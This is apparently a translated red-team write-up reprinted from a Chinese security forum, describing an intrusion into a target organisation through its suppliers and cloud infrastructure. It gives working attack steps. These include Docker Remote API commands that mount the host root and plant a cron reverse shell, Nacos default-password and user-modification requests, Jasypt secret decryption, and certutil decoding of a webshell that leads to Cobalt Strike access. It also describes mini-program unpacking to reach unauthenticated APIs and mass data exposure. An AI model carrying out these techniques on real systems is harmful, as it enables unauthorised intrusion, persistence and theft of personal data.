Title: A case of a breakthrough in the external network

1. Supply Chain

After years of offensive and defensive confrontation, a large number of target units have gradually realized the importance of safety protection. Therefore, they have taken steps to constrain asset exposure as much as possible and double down on the deployment of various security devices. However, safety protection focuses on comprehensiveness and has a clear short-term effect. Once a short-term situation occurs, the entire protection system may collapse instantly. The supply chain of the target unit is often a concentrated reflection of these weaknesses. These supply chains are not only exposed, but also make monitoring and management of them more difficult due to complex relationships. Therefore, attack teams usually choose to start from the supply chain and bypass the target unit's powerful defense system in a roundabout way and gain control over the target unit.

Search for 'System Name' Target Unit on Search Engine

Find relevant supplier information, and obtain the data and permissions of the target unit by attacking the supplier.

1.1, heapdump leak

By penetrating supplier assets, it was found that a heapdump file leak was found in the admin directory of a certain asset.

I won't go into details about the use of heapdump here. Many articles have conducted in-depth research on its principles and utilization. RCE can be performed directly under specific circumstances. A large amount of sensitive information is leaked here, and password information is added to the password book.

Log in to MinIO and find a large amount of sensitive information about the target unit, and there are also sensitive information about other units.

Log in to Nacos, add a large number of configuration files, and add password information to the password book![]

Log in to OSS and discover a large amount of sensitive information about the target unit

1.2. The WeChat applet interface is not authorized

1.2.1. Unpacking WeChat applet

If you want to unpack the WeChat applet, the first thing you need to do is to get the wxapkg file of the target applet. The wxapkg file is the installation package file format of WeChat applets, which is used to package the applet's code, resources and other necessary files into a separate file. However, the js code and resource files in the wxapkg file in the Windows environment are generally encrypted, and a specially designed decryption tool is required to first decrypt, then unpack and obtain the file contents. Unpacking can be performed directly under iOS and Android platforms.

1.2.1.1. Get wxapkg file

When obtaining wxapkg file, it is best to delete the files in the folder first, and then reopen the applet to prevent other files from interfering with it.

The iOS wxapkg file storage path is:

/var/mobile/Containers/Data/Application/{System UUID}/Library/WechatPrivate/{user hash value}/WeApp/LocalCache/release/{AppID of applet}

The Android wxapkg file storage path is:

/data/data/com.tencent.mm/MicroMsg/{user hash value}/appbrand/pkg/

The Windows wxapkg file storage path is:

C:\Users\{System Username}\Documents\WeChat Files\Applet\{AppID of applet}\

1.2.1.2. Decryption operation

The following two github projects can be decrypted

https://github.com/superdashu/pc_wxapkg_decrypt_python

https://github.com/BlackTrace/pc_wxapkg_decrypt

Decryption principle

Successfully decrypted

1.2.1.2. Unpacking operation

Tool download link provided by Guoguang boss

https://sqlsec.lanzoub.com/i1NEP0mx694f

node wuWxapkg.js 1.wxapkg

Unpack the applet, get the front-end JS code, and extract it from it to obtain the interface

Direct access to the target interface, although the front-end page shows initialization failure

However, data has been obtained in the traffic packet, and nearly 10 million sensitive information of target units have been found.

1.3. Web program overreaches

Through the above-collected password, a password is knocked out to create an account, but this account has the minimum permission and no operation permissions. Click to search for the organizational structure, and there is no return information at this time

Catch the package and remove parentId and orgLevel, and then send the package, you can see the organizational structure of all employees without permission.

Click to modify the password, and then add the roleId obtained above to obtain all permissions

Get a lot of data

1.4. Official account

js leaked password, password can hit the target unit's official account

2. Cloud native security

Containerized deployment and microservice architecture provide better flexibility, scalability, maintainability and performance for application development and deployment. It is used by more and more manufacturers. New applications will introduce new attack surfaces, such as container escape, inter-service attacks, API abuse, etc. Attackers can exploit these new entry points to attack applications and data. And managing the authentication and authorization of users and services in a cloud-native environment becomes more complex. Many application developers often overlook or place a secondary position when pursuing the convenience and efficiency of containerized and cloud-native architectures. This directly leads to the fragility of the cloud native environment and is vulnerable to various security threats and attacks.

2.1. Harbor mirror warehouse

Harbor is an open source container image repository manager designed to help organizations store, manage and distribute Docker container images, but Harbor has a controversial "vulnerability": any user can directly obtain public images.

You can directly pull and download the image file, and you can use scripts to download it in batches.

2.2. Suspected backdoor

Obtain the jar package through the image file, obtain sensitive information such as configuration files, decompile the class file of the jar package, and perform code audits to obtain a backdoor-like vulnerability. This interface only needs to use the user name to log in to the system background. Administrator permissions are used to obtain server permissions in combination with file upload.

Connect to database through configuration files, etc.

2.3. Docker is not authorized

2.3.1. Registry API unauthorized access

In the Docker Registry API, authentication and authorization are usually based on an access token or username and password. If access control permissions are not set correctly, an unauthorized access vulnerability will be caused. The attacker can directly download all mirror containers of the registry repository.

Visit the /v2/_catalog interface to view all repository contents

https://github.com/Soufaker/docker_v2_catalog

Use the above tools to download the mirror directly

2.3.2. Docker Remote API unauthorized access

In order to manage container clusters, Docker allows Daemon as a background daemon to execute Docker commands sent through the management interface, using the parameter -H

0.0.0.0:2375 Start Docker

When Daemon, port 2375 will be opened to receive commands from the remote Docker client. In this case, port 2375 is exposed as a non-encrypted port and there is no form of authentication. The attacker can directly connect to Docker using the Docker command

Daemon, and perform direct operations on the container, and can achieve container escape with the root directory mount.

#View container

docker -H tcp://target:2375 ps -a

#mount the root directory of the host to the mnt directory in the container

docker -H tcp://target:2375 run -it -v /:/mnt nginx:latest /bin/bash

#Rebound shell

echo 'bounce shell command' /mnt/var/spool/cron/crontabs/root

2.4. Nacos

Nacos is an open source dynamic service discovery, configuration management and service management platform. It provides functions such as registration center, configuration center and service management to help developers realize service registration, configuration management and service discovery requirements in the microservice architecture.

As an open source tool, many vulnerabilities have been disclosed.

Unauthorized access: /nacos/v1/auth/users?pageNo=1pageSize=1 Direct view of users

Add any user: POST /nacos/v1/auth/users username=password=

Modify any user password: curl -X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken\=' -H 'User-Agent:Nacos-Server' -d 'username\=test1newPassword\=test2'

Weak password: nacos/nacos

By scheduling passwords to blast into the background, a large number of configuration files were found, but the sensitive information was encrypted

2.4.1, Jasypt encryption

There will be some sensitive information in the configuration file of Spring, such as database passwords, so sometimes we want to encrypt sensitive information. Jasypt is a relatively convenient tool. Jasypt is a Java library used to simplify the encryption and decryption operations of sensitive data (such as passwords, API keys, etc.).

The encrypted content needs to be enclosed in ENC(.), and the encrypted password is specified by jasypt.encryptor.password.

spring:

datasource:

username: your-username

password: ENC(encrypted-password)

Because it must be decrypted, the password needs to be placed in the configuration file or in the code:

# application.yml

jasypt:

encryption:

password: Password

algorithm: encryption method

Decrypt data: Use the decrypt method of the decryptor to decrypt the encrypted data.

import org.jasypt.util.text.BasicTextEncryptor;

public class DecryptionExample {

public static void main(String[] args) {

String encryptionKey='yourEncryptionKey'; //Encryption key

BasicTextEncryptor textEncryptor=new BasicTextEncryptor();

textEncryptor.setPassword(encryptionKey);

String encryptedText='encryptedText'; //Encrypted data

String decryptedText=textEncryptor.decrypt(encryptedText);

System.out.println('Decrypted Text: ' + decryptedText);

}

}

However, the security of client encryption mainly depends on the protection and trustworthiness of client code. When the password is leaked, the encryption will naturally fail. If you find a jasypt encrypted password in a ncaos file, you can directly decrypt it

Successfully connected to OSS

Successfully connected to the database

Mini program token, take over mini program

Dameng Database is a domestic relational database. You can use the following tools to connect.

https://github.com/864381832/x-RdbmsSyncTool/releases/tag/v0.0.3

3. Nday

3.1. yongyouNC jsInvoke rce vulnerability

Vulnerability Exploit method, create a javax.naming.InitialContext object through the Java reflection mechanism, and connect to the specified IP address and port using the LDAP protocol. Then call the 'saveXStreamConfig' method in the 'nc.itf.iufo.IBaseSPService' service, accepting objects and strings as parameters, achieving the effect of command execution.

The command was successfully executed, but the target system has soft-killing, so the file cannot be uploaded directly

3.1.1, certutil

certutil is a command line tool in the Windows operating system. It is mainly used to handle certificate and encryption-related operations. The decryption operation of certutil can be bypassed.

echo bash64 encoding myfile.jsp

Decode using certutil

certutil -decode Trojan relative path The decoded Trojan relative path

Ice Scorpion is online and CS is launched

3.2. If you open it with two

Shiro's hole was fixed, and a front desk information leak vulnerability was found

By obtaining the username, use weak password to enter the background, normal permissions

Once again, the announcement post guessed the password and successfully logged into the background. The system management permissions were added, and the user was given the highest permissions.

Added user login, discover the timed task function, and directly use the timed task to execute commands

3.3, shiro

When the target path is accessed, it will first jump to the unified authentication login, resulting in most people ignoring that the path has a shiro deserialization vulnerability.

With a try-through mentality, I scanned the shiro, and obtained the permissions directly.

Reprinted from the original link: https://forum.butian.net/share/2442